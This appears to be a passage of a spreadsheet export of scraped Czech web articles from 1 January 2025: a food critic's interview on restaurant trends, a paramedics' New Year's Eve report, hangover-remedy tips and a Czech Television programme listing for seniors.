se dalo říct, že lidé dnes více přemýšlejí, kam zajdou na menu? Že už nejsou spokojeni jen tak s něčím, a chtějí si jídlo, za které dají peníze, skutečně vychutnat? Bylo by krásné, kdyby to bylo přesně tak, jak říkáte. Lidem minimálně není lhostejné, kam na jídlo půjdou. Chodí za zážitky, o kterých slyšeli, jaké jim někdo doporučil. Gastronomie je nyní jedna z nejsilnějších karet turistického ruchu a kdo si to nemyslí, měl by přehodnotit své myšlení. Jídlo úplně změnilo hru a také byznys v oblasti turistického ruchu. Vystupujete na panelové diskusi na Global Goals Summitu s tématem udržitelnosti gastropodniků. Dívají se nyní spotřebitelé vedle kvality také na udržitelnost podniků? Kdekoliv, nejen v gastronomii je udržitelnost obtížně definovatelné slovo. Pro každého jednice může znamenat něco jiného, pro někoho je slovo udržitelnost dokonce „red flag“. I já jsem v tomhle poměrně shovívavý, pro mě být udržitelný neznamená jenom nepoužívat plastová brčka v limonádě. Co pro vás tedy znamená? Podle mě může být udržitelné podnikaní třeba podnik, jenž funguje na rodinné bázi a zaměstnává férově několik lidí. Používá místní suroviny, které je schopný komunikovat v menu, ale i v propagaci na sociálních sítích, bere karty, nemá jídelní lístek jako bibli a pracuje s čerstvými surovinami. Je sice hezké, pokud si zajišťuje sám i své zdroje, ale takových případů je v českém gastru jen několik. A otázkou je, zda je „taková udržitelnost“ vůbec udržitelná. Nevím, zda to může majitel zvládnout, vyjít nejen finančně, ale i psychicky. Dnes často slyšíme o udržitelnosti jako o nařízení. A pokud nefungujeme udržitelně, jsme automaticky špatní. Zároveň se však úplně neví, co se tou udržitelností vlastně myslí. Mohou být lokální dodavatelé pro podniky konkurenční výhoda? O tomhle se už mluví posledních deset let. Pro mě — proč ne. Ale opravdu to už není něco, co by mě překvapilo. Dnes už by mělo být automatické, že má daný podnik u jednotlivých položek uvedený zdroj surovin. V současnosti se mluví o spoustě nových platformách. Příkladem může být nákupní aliance, jako je třeba sdružení Jíme jih — Spolek jihočeských restaurací, kde se pět hospod domluvilo, nakupují dohromady a ušetří. Samozřejmě jinak nemám nic proti velkým dodavatelům jako je Makro nebo Bidfood, i tyto firmy mají dobré produkty. Celkově je nutné ale zlepšit cestu od farmáře k restauraci, protože tam chybí prostředník. Pak je mi vlastně docela jedno, jestli má suroviny dodávat Rohlík, Tesco nebo Makro. Krásným příkladem jsou třeba vejce. Ve snídaňových podnicích — a nic teď není tak trendy, jako snídaně — jsou v menu každého fancy bistra farmářská vejce. Jaké jsou další trendy v gastru? Představme si, že si chci otevřít kavárnu. Jak se odlišit od ostatních? Čím zaujmout? Oblíbené jsou především mladistvé podniky, které stojí na výběrové kávě, snídani, rychlých jídlech. Podniky, které lákají všechny generace na nové, netradiční věci jako jsou snídaně a brunche. Zkrátka věci, u kterých nemáme historicky v paměti, že se jedná o jídlo do dvou set korun přes celý talíř. Musí to být nějaký jiný, ale pořád dostupný zážitek. Tohle má větší perspektivu než staré provozování gastra typu „sytím lidi obědem, dávám zdarma polívku, lákám je na nápoj nebo na moučník a vlastně trošku živořím, protože zákazníci mě berou jako takovou lepší jídelnu.“ Tedy něco, co změní uvažování lidí — proč si vyberou zrovna tento podnik, proč dají za jídlo větší peníze a jaký od toho očekávají zážitek. Co se týká nočního života, barů — drinků, ale vlastně i piva , tam pozoruji růst kvality na úkor kvantity. Ale právě kvalita má větší šanci na úspěch. Zmiňujete vyšší cenu. Jsou dnes lidé ochotni si za kvalitu připlatit? I v kontextu nedávné bouřlivé ekonomické situace… Určitě ano. Ačkoliv propad v gastru byl, záleželo, v kterém segmentu a městě. Určitě se netýkal podniků, které od začátku s cenou operovaly sebevědomě. Protože gastro nezdražovalo, gastro dorovnávalo. A dorovnalo dostatečně? Velmi často se už zastávám spíše podniků než hostů, což by asi mělo být opačně, nebo bych měl být alespoň nestranný. Ale mám prostě pocit, že to celé pramení z toho, že jsme si mohli dovolit chodit do restaurace každý den. To není ve světě úplně běžné. Až nyní se z jídla začíná stávat gastronomický zážitek, který má být nestandardní. A nemusíme ho zažívat každý den, stačí třeba jednou za měsíc. Chápu, podniky se obávají, že nebude tak vysoká návštěvnost. Ale když se zaměří na to, aby z jídla byl skutečně gastronomický zážitek, bude se jim dařit. Jaký byl váš poslední gastronomický zážitek? Zapisuji si všechny tipy, co mi chodí, ale je jich strašně moc, v současné době asi tři tisíce. Pokud mi to dovolí nálada a chuť nebo hlad, tak si vybírám, co je v okolí a co můžu zvládnout. Je to tedy úplná ruleta. Ještě dva dny dopředu moc nevím, kde budu. Nikomu o sobě neříkám a zjevím se bez ohlášení. Všechno sním, dojím, zaplatím a třeba po dvou měsících o tom píšu. Každý den přináším jiný tip, takže dnes jsem třeba psal po osmi letech upravený report, říkám tomu druhá návštěva v Café Louvre . Předevčírem jsem psal zase o cukrárně Zlatá Pecka v obci u hradu Pecka v Podkrkonoší a zítra ještě nevím, co to bude. Autor: Šimon Hauser Autor person Šimon Hauser Rubrika transition_slide Komunita</t>
  </si>
  <si>
    <t>20250101_317_3694488896_0d27f489114ad94456f4.html</t>
  </si>
  <si>
    <t>0d27f489114ad94456f4</t>
  </si>
  <si>
    <t>Zahájení roku bilancují i záchranáři, neslavné prvenství si zapsali záchranáři z Kolína</t>
  </si>
  <si>
    <t>Zahájení roku bilancují i záchranáři, neslavné prvenství si zapsali záchranáři z Kolína Středa, 1. ledna 2025 07:51 Středočeští záchranáři, tak jako každý rok, museli ošetřovat zranění od pyrotechniky a samozřejmě i mnoho osob které neodhadli míru při požití alkoholu . Ilustrační foto: KL Jak uvedla mluvčí záchranářů Monika Nováková v raním rozhovoru pro Kladenské listy:,, Příchod Nového roku byl pro nás náročnější v porovnání s tím minulým. Ačkoliv bylo nutné ošetřit více osob, naštěstí nedošlo k žádnému úmrtí v přímém spojení s oslavou příchodu nového roku.“ Během letošních silvestrovských oslav záchranáři zasahovali u šesti pacientů, kteří se zranili zábavní pyrotechnikou, a čtyř lidí popálených od pyrotechniky. Dále měli v péči 46 lidí s intoxikací alkoholem . ,,První výjezd v souvislosti se zábavní pyrotechnikou měla posádka z Kolína pět minut po půlnoci. Pro srovnání, během loňské 12hodinové silvestrovské směny jsme ošetřili tři zraněné od pyrotechniky a dvanáct lidí s alkoholovou intoxikací, dodala Monika. Autor: Pavel Varvařovský Autor person Pavel Varvařovský Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20250101_318_3694465076_f427de03b593cc7bb540.html</t>
  </si>
  <si>
    <t>f427de03b593cc7bb540</t>
  </si>
  <si>
    <t>Připravte si doma účinné vyprošťováky, které vám pomohou s kocovinou po Silvestru!</t>
  </si>
  <si>
    <t>Připravte si doma účinné vyprošťováky, které vám pomohou s kocovinou po Silvestru! Silvestr je za vámi a s ním i nekonečné večírky, přípitky a zábava do ranních hodin. Ale co dělat, když ráno po oslavě nastoupí těžká kocovina? V tomto článku vám představíme šest nejúčinnějších vyprošťováků, které vám pomohou vrátit se zpět do formy a přežít Nový rok bez bolesti hlavy a žaludku. Voda, voda, voda! Prvním a nejdůležitějším krokem k úlevě od kocoviny je hydratace. Alkohol dehydratuje tělo, což je jedním z hlavních důvodů, proč se po večírku cítíte tak mizerně. Ztrácíte totiž nejen vodu, ale i důležité minerály. Proto je klíčové doplnit tekutiny co nejdříve, jakmile se probudíte. Ideálně byste měli vypít sklenici vody ještě před tím, než půjdete spát, ale pokud jste to nezvládli, ráno to napravte. Není však voda jako voda. Pokud máte silnou kocovinu, je dobré sáhnout po minerálních vodách, které obsahují elektrolyty, jako je sodík a draslík, které vám pomohou obnovit rovnováhu tekutin v těle. Doplnění tekutin vám pomůže zmírnit bolesti hlavy, sucho v ústech a celkový pocit slabosti. TIP: Pro maximální účinek můžete do vody přidat několik kapek citronové šťávy, která vám poskytne vitamín C a zároveň podporuje trávení. Silný kuřecí nebo hovězí vývar Dalším tradičním a osvědčeným prostředkem na kocovinu je silný vývar. Ať už se rozhodnete pro kuřecí, hovězí nebo zeleninovou variantu, vývar vám dodá potřebné živiny a elektrolyty, které vám pomohou zregenerovat tělo po prohýřené noci. Vývar je nejen snadno stravitelný, ale také podporuje trávení a zahřívá organismus, což je důležité pro obnovení energie. Obsahuje bílkoviny a aminokyseliny, které podporují regeneraci svalů a tkání. Také díky vysokému obsahu tekutin pomáhá s hydratací těla. TIP: Pro ještě lepší účinek přidejte do vývaru čerstvé bylinky jako petrželku nebo tymián, které mají detoxikační účinky. Banány a další ovoce bohaté na draslík Kocovina často souvisí s nízkou hladinou draslíku v těle, protože alkohol zvyšuje jeho vylučování z těla. Draslík je přitom důležitý pro správnou funkci nervového a svalového systému, a jeho nedostatek může způsobit únavu, svalové křeče a slabost. Banány jsou skvělým zdrojem draslíku a také snadno stravitelným jídlem, které vám pomůže rychle doplnit energii. Dalším ovocem, které je bohaté na draslík, je například avokádo, pomeranče nebo meloun. Kromě draslíku vám ovoce dodá i vitamíny a přirozené cukry, které vás rychle postaví na nohy. Ovoce také obsahuje vysoké množství vody, takže přispívá k hydrataci. TIP: Připravte si ráno po oslavě ovocný smoothie, který kombinuje banány, pomeranče a jogurt. Získáte tak nejen potřebné vitamíny, ale i probiotika pro lepší trávení. Vajíčka jako rychlý zdroj bílkovin Když je váš žaludek konečně připravený přijmout nějaké jídlo, sáhněte po vajíčkách. Vajíčka jsou bohatá na bílkoviny a obsahují aminokyselinu cystein, která pomáhá tělu rozkládat toxiny vzniklé při konzumaci alkoholu , především acetaldehyd, což je vedlejší produkt rozkladu alkoholu v játrech a jeden z hlavních viníků kocoviny. Vajíčka jsou také snadno připravitelná, takže si můžete rychle udělat míchaná vajíčka, omeletu nebo vajíčko na tvrdo. Díky svému obsahu bílkovin vám dodají potřebnou energii na celý den, aniž by zatížila váš žaludek. TIP: Pro zvýšení účinku zkombinujte vajíčka s celozrnným pečivem a avokádem, čímž získáte komplexní jídlo bohaté na vlákninu, zdravé tuky a další důležité živiny. Zázvorový čaj pro uklidnění žaludku Pokud vás po bujaré noci trápí žaludek a nevolnost, sáhněte po zázvorovém čaji. Zázvor je přírodní lék, který má silné protizánětlivé a antiemetické účinky, což znamená, že může pomoci zmírnit nevolnost a zklidnit podrážděný žaludek. Zázvor také podporuje trávení a zrychluje metabolismus, což urychluje odbourávání alkoholu v těle. Stačí si připravit čaj z čerstvého zázvoru, zalít ho horkou vodou a nechat několik minut louhovat. Přidání medu může pomoci zmírnit kyselou chuť a přidat další zdravotní benefity, jako je posílení imunity. TIP: Pro lepší chuť a účinky můžete do zázvorového čaje přidat špetku skořice a citronovou šťávu, což zlepší trávení a urychlí detoxikaci těla. Kokosová voda jako přírodní iontový nápoj Kokosová voda je často označována jako přírodní iontový nápoj a má to svůj důvod. Obsahuje totiž vysoké množství elektrolytů, především draslíku a hořčíku, které pomáhají obnovit rovnováhu tekutin v těle po dehydrataci způsobené alkoholem . Díky nízkému obsahu cukru a vysoké hydrataci je kokosová voda ideálním nápojem pro rychlé zotavení z kocoviny. Kromě toho má kokosová voda i detoxikační účinky, což znamená, že může pomoci tělu rychleji se zbavit škodlivých látek. Je také lehce stravitelná, takže ji můžete pít i v případě, že váš žaludek ještě není připravený na pevnou stravu. TIP: Pokud nemáte po ruce kokosovou vodu, můžete zkusit i obyčejnou vodu s přidanými elektrolyty, kterou najdete ve většině obchodů s potravinami. Kocovina není příjemný zážitek, ale s těmito osvědčenými vyprošťováky ji můžete zvládnout s přehledem. Nezapomínejte, že nejlepší prevence kocoviny je umírněná konzumace alkoholu a dostatek vody během samotné oslavy. Pokud vás ale ráno přece jen dostihne, vyzkoušejte naše tipy a vraťte se rychle do formy! Inspiroval vás článek? Řekněte o něm přátelům: V první řadě si musíte uvědomit, že neexistují žádné zázračné potraviny, díky kterým zmizí vir Covid-19 z vašeho těla O Autorovi Redakce Redaktoři a přispěvatelé magazínu Ostrov Inspirace připravují praktické rady a zajímavé články pro každodenní život. Pokud máte zajímavý článek, který byste chtěli zveřejnit v magazínu, můžete nás kontaktovat. Kontaktní formulář můžete využít i v případě zájmu o inzerci v magazínu. Autor: Redakce</t>
  </si>
  <si>
    <t>185</t>
  </si>
  <si>
    <t>178</t>
  </si>
  <si>
    <t>20250101_319_3736223817_12f5e6cc04dccf0a0e7a.html</t>
  </si>
  <si>
    <t>12f5e6cc04dccf0a0e7a</t>
  </si>
  <si>
    <t>Pořady pro seniory ve vysílání České televize v lednu 2025 s možností shlédnutí na webu ČT</t>
  </si>
  <si>
    <t>Pořady pro seniory ve vysílání České televize v lednu 2025 s možností shlédnutí na webu ČT – Publikováno 1.1.2025 V kategorii: Aktuality Pořady pro seniory ve vysílání ČT1 v lednu 2025 s možností shlédnutí na webu ČT Některé pořady jsou dostupné na webu ČT až po odvysílání a některé jsou dostupné pouze určitou dobu dle zakoupené licence. (Přechod na odkaz pořadu Ctrl + kliknutí) Český film Bratři (středa 1.1. 20:10) – Jeden z největších příběhů studené války. Komunistický režim stupňuje represe vůči vlastnímu obyvatelstvu a bratři Mašínové se chtějí po vzoru svého otce postavit zlu se zbraní v ruce. Televizní premiéra koprodukčního filmu ČT, který získal Českého lva za nejlepší film roku 2023 - https://www.ceskatelevize.cz/porady/12663107942-bratri/ Teorie tygra (středa 1.1. 22:25) – Jiří Bartoška září v komedii o veterináři, který už nechce být ochočeným domácím králíčkem. Touží stát se znovu tygrem! Koprodukční snímek ČT (2016) - https://www.ceskatelevize.cz/porady/10413436272-teorie-tygra/ Dlouhý týden (čtvrtek 2.1. 10:40) – Gabriela Vránová v roli ženy, která se cítí být opuštěná. A tak se rozhodne navázat novou, vzrušující známost… (1981) - https://www.ceskatelevize.cz/porady/10088562614-dlouhy-tyden/ Mít tak holku na hlídání (čtvrtek 2.1. 12:30) – S dětmi jsou starosti. A co teprve, je-li tím dítětem dcera na vdávání. Malá televizní komedie (1980) - https://www.ceskatelevize.cz/porady/135957-mit-tak-holku-na-hlidani/ Prvok, Šampón, Tečka a Karel (čtvrtek 2.1. 20:10) – Komedie o čtveřici čtyřicátníků, kteří docházejí k poznání, že nežijí tak, jak si kdysi přáli. Krizi středního věku se rozhodnou čelit provokativní hrou a plněním odvážných úkolů. Koprodukční film ČT (2021) - https://www.ceskatelevize.cz/porady/12858226408-prvok-sampon-tecka-a-karel/ Občanský průkaz (čtvrtek 2.1. 22:05) – Komedie o jedné rebelii proti husákovskému socialismu a vlastní cestě k dospělosti. Koprodukční film ČT byl volně inspirován stejnojmennou knihou P. Šabacha (2010) - https://www.ceskatelevize.cz/porady/10244923435-obcansky-prukaz Zkouška (pátek 3.1. 9:50) – Lubomír Lipský a Iva Janžurová v televizní komedii o tom, co předcházelo získání řidičského průkazu (1981) - https://www.ceskatelevize.cz/porady/137048-zkouska/ Španělská paradentóza (pátek 3.1. 13:50) – Petr Nárožný a Dagmar Veškrnová v komedii o zubaři, povedeném strýčkovi a lásce (1986) - https://www.ceskatelevize.cz/porady/133866-spanelska-paradentoza/ Zbožňovaný (pátek 3.1. 20:10) – Komedie o uznávaném a všemi oblíbeném pediatrovi, který se rozhodne odejít do důchodu a spolu s tím ukončit i dlouhodobý milenecký poměr. Problém je, že milenka je zásadně proti! Koprodukční film ČT (2021) - https://www.ceskatelevize.cz/porady/13612711181-zboznovany/ Báječná léta pod psa (pátek 3.1. 21:50) – Libuše Šafránková a Ondřej Vetchý ve filmové komedii podle známého románu Michala Viewegha . Koprodukční snímek ČT (1997) - https://www.ceskatelevize.cz/porady/95045-bajecna-leta-pod-psa/ Sluníčko na houpačce (sobota 4.1. 15:00) – Televizní film o chlapci, který hledá domov (1981) - https://www.ceskatelevize.cz/porady/133773-slunicko-na-houpacce/ Pytlákova schovanka (sobota 4.1. 16:25) – …aneb Šlechetný milionář. Hana Vítová a Oldřich Nový ve slavné parodii na sladkobolné příběhy, v nichž chudá dívka ke štěstí přišla (1949) - https://www.ceskatelevize.cz/porady/16183-pytlakova-schovanka/ Ikarův pád (neděle 5.1. 15:20) – Vladimír Menšík a Jana Hlaváčová v českém televizním filmu oceněném na mezinárodních festivalech v Monte Carlu a na Zlaté Praze . Příběh o lásce, důvěře a selhávání (1977) - https://www.ceskatelevize.cz/porady/134218-ikaruv-pad/ Vzestup po šikmé ploše (středa 8.1. 14:00) – Televizní hra o mladé idealistické učitelce, která se dostane do střetu s vlivným otcem jedné ze svých studentek (1988) - https://www.ceskatelevize.cz/porady/117300-vzestup-po-sikme-plose/ Dětinské hry dospělých (čtvrtek 9.1. 15:00) – Televizní film podle novely Valji Stýblové Nevěra (1990) - https://www.ceskatelevize.cz/porady/113085-detinske-hry-dospelych/ Hedvika (pátek 10.1. 14:20) – Svůj první velký případ řeší mladá lékařka. Hlavní roli ztvárnila Lenka Skopalová (1979) - https://www.ceskatelevize.cz/porady/123734-hedvika/ Bábovky (pátek 10.1. 20:10) – Některá setkání navždy změní náš život. Tragikomedie podle románového bestselleru Radky Třeštíkové . Koprodukční film České televize (2020) - https://www.ceskatelevize.cz/porady/11934992498-babovky/ Jak svět přichází o básníky (sobota 11.1. 22:05) - První část známé filmové série o dvou nerozlučných kamarádech, první lásce a divadelním představení, na které se ještě dlouho vzpomínalo (1982) - https://www.ceskatelevize.cz/porady/20884-jak-svet-prichazi-o-basniky/ Studujeme za školou! (sobota 11.1. 15:30) – Študáci versus kantoři v české veselohře Miroslava Cikána (1939) - https://www.ceskatelevize.cz/porady/27479-studujeme-za-skolou/ Tažní ptáci (neděle 12.1. 15:50) – Volné pokračování televizního filmu Ikarův pád. Vladimír Menšík a Vlastimil Brodský (oceněný hlavní cenou na MTF Monte Carlo ) v hlavních rolích příběhu zápasu o znovunabytí lidské důstojnosti (1983) - https://www.ceskatelevize.cz/porady/134001-tazni-ptaci/ Pupendo (úterý 14.1. 21:45) – Česká komedie, navazující svou poetikou na úspěšné Pelíšky, odkrývá každodenní příběhy lidí vystavených banální a groteskní realitě světa českého socialismu. Koprodukční film ČT. - https://www.ceskatelevize.cz/porady/1065818155-pupendo/ Velká sázka o malé pivo (neděle 26.1. 14:15) – Oldřich Kaiser a Jiří Lábus v komedii o jedné neobvyklé obchodní transakci (1981) - https://www.ceskatelevize.cz/porady/137092-velka-sazka-o-male- pivo / Český krimi film Dům na samotě (sobota 4.1. 20:05) - Na začátku byla tajemná vražda mladé ženy… Napínavá detektivka je inspirovaná románovým bestsellerem Michaely Klevisové (2022) - https://www.ceskatelevize.cz/porady/12843498659-dum-na-samote/ Kroky vraha (neděle 5.1. 20:10) – V elegantní vilové čtvrti nemá někdo spadeno jen na kočky. Když dojde k první vraždě, musí inspektor Bergman odhalit temná tajemství, která se ukrývají za zdánlivě idylickým povrchem. Premiéra psychologické detektivky z produkce České televize, kterou inspiroval oceňovaný román Michaely Klevisové - https://www.ceskatelevize.cz/porady/12527890410-kroky-vraha/ Ten, kdo tě miloval (středa 8.1. 22:10) – Komediálně laděný příběh s detektivní zápletkou na motivy stejnojmenného románu Marie Poledňákové . Koprodukční snímek ČT (2018) - https://www.ceskatelevize.cz/porady/11922252787-ten-kdo-te-miloval/ Zločin na poště (sobota 11.1. 08:55) – Ona si je ani nepůjčila… Vladimír Menšík v televizním přepisu jedné ze slavných povídek Karla Čapka (1980) - https://www.ceskatelevize.cz/porady/136106-zlocin-na-poste/ Filmová pohádka Zázračný nos (středa 1.1. 15:20) – Velká výpravná česko-slovenská pohádka o dvou krásných princeznách, bohatém nápadníkovi a chudém zamilovaném mládenci. Kdo ke komu patří? Naštěstí je tu ještě jeden kouzelník, který dokáže každému z nich připravit zkoušku… (2016) - https://www.ceskatelevize.cz/porady/11521979331-zazracny-nos/ Nejlepší přítel (středa 1.1. 17:15) – Výpravná pohádka o hledání štěstí, o lásce, ale hlavně o kamarádství, které dokáže být silnější než úklady samotného pekla - https://www.ceskatelevize.cz/porady/11344201242-nejlepsi-pritel/ Král Drozdí brada (čtvrtek 2.1. 14:35) - Princezna pravila, že by se raději stala žebračkou než ženou takového krále. A tak se taky stalo… Lukáš Vaculík a Adriana Romanová - Tarábková v pohádce o potrestané pýše natočené ve slovensko-německé koprodukci (1984) - https://www.ceskatelevize.cz/porady/15419522665-kral-drozdi-brada/ Mahulena, zlatá panna (pátek 3.1. 15:30) - Podaří se odvážnému princi a jeho sluhovi zlomit moc ukrutného Zlatovlada a zachránit své království? Dobrodružný pohádkový příběh o věrnosti a lásce natočený v koprodukci Slovenska a Západního Německa (1986) - https://www.ceskatelevize.cz/porady/26281-mahulena-zlata-panna/ Zahraniční film Bezva finta (sobota 4.1. 21:40) – Návod, jak vyloupit banku aneb Jean-Paul Belmondo v nejlepší formě! Francouzsko-kanadská komedie (1985) - https://www.ceskatelevize.cz/porady/23557-bezva-finta/ Muž z Acapulca (neděle 5.1. 21:35) – Spisovatel, vysněný hrdina brakových románů a nejlepší role Jean- Paula Belmonda . Francouzsko-italská komedie (1973) - https://www.ceskatelevize.cz/porady/26155-muz-z-acapulca/ Koncert Tříkrálový koncert 2025 (neděle 5.1. 18:00) – Přímý přenos 18. ročníku koncertu, který Charita ČR věnuje všem koledníkům. Účinkují Chantal Poullain , Michal Horák, Tereza Mašková a hudební skupina O5 a Radeček - https://www.ceskatelevize.cz/porady/15397862043-trikralovy-koncert/32529838008/ Český seriál Limity (neděle 20:10) – Ekologickým aktivistou proti své vůli. Jak se z manželského sporu stane celospolečenský konflikt a z podnikatele s toxickým odpadem ikona ekologických aktivistů? Premiéra seriálu Petra Zelenky a jeho přátel - https://www.ceskatelevize.cz/porady/15768046164-limity/ Český krimi seriál Případy 1. oddělení II (pondělí 20:10) – Kriminální seriál (2016) - https://www.ceskatelevize.cz/porady/10354229723-pripady-1-oddeleni/ Dobrodružství kriminalistiky (neděle 11:05) – Populární cyklus detektivních příběhů o odvěkém zápasu práva se zločinem (1989) - https://www.ceskatelevize.cz/porady/898901-dobrodruzstvi-kriminalistiky/ Cirkus Bukowsky (neděle 21:50) od 12.1. – Kdo zabil Editu Tichou? Pátrání na vlastní pěst někdy bolí. Detektivní road movie s Pavlem Řezníčkem v hlavní roli (2013) - https://www.ceskatelevize.cz/porady/10403241116-cirkus-bukowsky/ Zahraniční seriál Srdce (středa 20:10) od 8.1. – Sny, ambice a lásky personálu kardiochirurgického oddělení nemocnice Le Molinette v Turíně na sklonku 60. let. Italský seriál (2021) - https://www.ceskatelevize.cz/porady/15693972603-srdce/ Zahraniční kriminální seriál Maigret (pondělí 22:45) – Bruno Cremer jako slavný detektiv. Francouzský koprodukční seriál - https://www.ceskatelevize.cz/porady/1093605885-maigret/ Dalgliesh II (pondělí 23:25 a úterý 23:40) do 21.1. – Adam Dalgliesh rozplétá složitou síť žárlivosti, pomsty, vydírání a tajných lásek. Britská adaptace stejnojmenného románu P. D. Jamesové (2023) - https://www.ceskatelevize.cz/porady/14885918199-dalgliesh/ Kruk (pondělí 23:25 a úterý 23:40) od 27.1. – Nechce se jen mstít, chce dostat viníky před soud. Polský seriál (2018) - https://www.ceskatelevize.cz/porady/15331506417-kruk/ Komisařka Florence (úterý a čtvrtek 20:10) – Annecy a jeho zločiny. Francouzský kriminální seriál (2022) - https://www.ceskatelevize.cz/porady/15109660246-komisarka-florence/ Hercule Poirot (pátek 22:05) – David Suchet v hlavní roli britského seriálu, natočeného podle literární předlohy Agathy Christie (1989) - https://www.ceskatelevize.cz/porady/10111864738-hercule-poirot/ Případy detektiva Murdocha XVII (neděle 22:50) – Nová řada oblíbeného britsko-kanadského krimi seriálu o muži, který ví, že pokrok nezastavíš (2023) - https://www.ceskatelevize.cz/porady/10196011288-pripady-detektiva-murdocha/ Dokument Dva chrámy Josefa Kemra (úterý 7.1. 10:30) – Osobitý herec i člověk ve vzpomínkách B. Bohdanové, K. Fialové, T. Medvecké, L. Skořepové, M. Steinmasslové, J. Hrušínského, B. Rösnera, Z. Svěráka a dalších (2005) - https://www.ceskatelevize.cz/porady/10123383458-pribehy-slavnych/405235100211004/ Všechny bitvy Zdeňka Štěpánka (čtvrtek 16.1. 10:35) – Na jednoho z největších českých herců vzpomínají všichni jeho potomci a mnozí další (2006) - https://www.ceskatelevize.cz/porady/10123383458-pribehy-slavnych/406235100211012/ Ritz, nebo nic (čtvrtek 30.1. 10:35) – Hvězda českého filmu třicátých a čtyřicátých let Adina Mandlová a její pestré i nelehké životní osudy v ukázkách a vyprávěních Z. Procházkové, Z. Kabátové, H. Talpové, O. Suchého , P. Taussiga, S. Motla a dalších (2011) - https://www.ceskatelevize.cz/porady/10123383458-pribehy-slavnych/411235100211012/ Zábavný pořad Všechnopárty (pátek 21:10 a sobota 21:20) – Zábavná talk show Karla Šípa - https://www.ceskatelevize.cz/porady/10090925908-vsechnoparty/ Zázraky přírody (sobota 20:05) od 11.1. – Zábavná show, kde největší hvězdou je příroda sama. Moderátoři Maroš Kramár a Vladimír Kořen vás provedou pořadem, u kterého se budete divit a žasnou - https://www.ceskatelevize.cz/porady/10214135017-zazraky-prirody/ Výborná SHOW (neděle 21:10) – Talk show Lucie Výborné - https://www.ceskatelevize.cz/porady/16047276686-vyborna-show/ Zajíc v pytli (středa 8.1. 9:50) – Zábavný pořad s Miloslavem Šimkem a Jiřím Krampolem neboli “besídka bývalých žáků zvláštní školy” v divadle Semafor (1990) - https://www.ceskatelevize.cz/porady/899444-zajic-v-pytli/ Publicistika Reportéři ČT (pondělí 21:15) – Kauzy a reportáže s Anetou Snopovou - https://www.ceskatelevize.cz/porady/1142743803-reporteri-ct/ Bilance (pondělí 20.1. 21:55) – Největší ekonomické výzvy a šoky současnosti pod drobnohledem reportérů ČT. Jak velká čísla ovlivňují budoucnost malých lidí - https://www.ceskatelevize.cz/porady/14021364946-bilance/ 13. komnata (středa 21:40) od 8.1. – Dokumenty představující osobnosti našeho současného politického a kulturního života - https://www.ceskatelevize.cz/porady/1186000189-13-komnata/ Máte slovo s M. Jílkovou (čtvrtek 21:40) od 9.1. – Tváří v tvář problému. Živě s M. Jílkovou - https://www.ceskatelevize.cz/porady/10175540660-mate-slovo-s-m-jilkovou/ Na stopě (čtvrtek 22:40) od 23.1. – Zločin nelze vymýtit. S vaší pomocí se mu však můžeme bránit. Moderuje Roman Svoboda - https://www.ceskatelevize.cz/porady/1100492707-na-stope/ Další pořady AZ-kvíz (po-pá 17:15) – Soutěž pro každého - https://www.ceskatelevize.cz/porady/1097147804-az-kviz/ Kde domov můj? (po-pá 18:25) - Zábavná vědomostní soutěž. Moderuje Aleš Háma - https://www.ceskatelevize.cz/porady/11261982253-kde-domov-muj/ Hobby naší doby (sobota 12:25) – Jiřina Bohdalová v půlhodince inspirací a zajímavostí pro volný čas - https://www.ceskatelevize.cz/porady/10314241266-hobby-nasi-doby/ Kočka není pes (sobota 17:50) od 11.1. – Premiéra deváté řady cyklu České televize, ve kterém Rudolf Desenský a Klára Nevečeřalová radí majitelům s výchovou domácích mazlíčků - https://www.ceskatelevize.cz/porady/11535735801-kocka-neni-pes/ Kluci v akci (sobota 18:25) – Televizní cyklus s tématikou vaření - https://www.ceskatelevize.cz/porady/10084897100-kluci-v-akci/ Toulavá kamera (neděle 10:00) - Mozaika z regionů - https://www.ceskatelevize.cz/porady/1126666764-toulava-kamera/ Objektiv (neděle 10:30) - Magazín zahraničních zajímavostí - https://www.ceskatelevize.cz/porady/1096911352-objektiv/ Buchty po ránu (neděle 8:10) – Josef Maršálek společně s Terezou Bebarovou pečou známé i méně známé sladké i slané dobroty. S humorem a lehkostí odtajní triky, jak vykouzlit to nejlepší - https://www.ceskatelevize.cz/porady/15179987928-buchty-po-ranu/ Co naše babičky uměly a na co my jsme zapomněli (neděle 18:25) od 12.1. – Lifestylový pořad, díky kterému znovuobjevíte rady starších a moudřejších. Jak skloubit shon moderního života s historickou tradicí? - https://www.ceskatelevize.cz/porady/12059685760-co-nase-babicky-umely-a-na-co-my-jsme-zapomneli/ Pořady pro seniory ve vysílání ČT2 v lednu 2025 s možností shlédnutí na webu ČT Pořady jsou dostupné na webu ČT až po odvysílání a některé jsou dostupné pouze určitou dobu dle zakoupené licence Český dokument úterý 20:00/21:00 Útěk do Berlína (7.1.) - https://www.ceskatelevize.cz/porady/15304222714-utek-do-berlina/ Všichni lidé budou bratři (14.1.) - https://www.ceskatelevize.cz/porady/11244330792-vsichni-lide-budou-bratri/ Hranice Evropy (21.1.) - https://www.ceskatelevize.cz/porady/13929012462-hranice-evropy/ Naše generace 1-4 (28.1. – 4.2.) - https://www.ceskatelevize.cz/porady/16356529506-nase-generace/ středa 20:50 Hledání ztracených světů – Jižní Kavkaz s Romanem Zachem - https://www.ceskatelevize.cz/porady/12500835975-hledani-ztracenych-svetu/ středa 21:20 C. a k. Technické památky českých zemí - https://www.ceskatelevize.cz/porady/13862568241-technicke-pamatky-ceskych-zemi/ Fenomény dneška (čtvrtek 22:00) Sněhové vločky v bodě tání (9.1.) - https://www.ceskatelevize.cz/porady/16265737387-snehove-vlocky-v-bode-tani/ Dětský hazard (16.1.) - https://www.ceskatelevize.cz/porady/16217722669-detsky-hazard/ Fentanyl lék i zabiják (23.1.), Hovory ze tmy (30.1.) – odkaz se objeví na webu později Mimoschématové sváteční pořady Naše tradice: Silvestr a Nový rok (1.1.) - https://www.ceskatelevize.cz/porady/10519120758-nase-tradice/212562260400006/ Novoroční koncert Vídeňských filharmoniků 2025 (1.1.) - https://www.ceskatelevize.cz/porady/1033605116-novorocni-koncert-videnskych-filharmoniku/22554215001/ Ze zahraničních cyklů – z večerních časů ČT2 – dostupné na webu: - užití na internetu je omezeno licencí ve smlouvě (většinou na 7-14 dní od odvysílání ) u těchto pořadů doporučujeme je vyhledat v co nejkratší lhůtě po televizním uvedení úterý 22:00 Vzestup a pád nacistů 1-10 (7.1. – 11.3.) - https://www.ceskatelevize.cz/porady/14592518730-vzestup-a-pad-nacistu/ středa 20:00 Stanley Tucci a všechny chutě 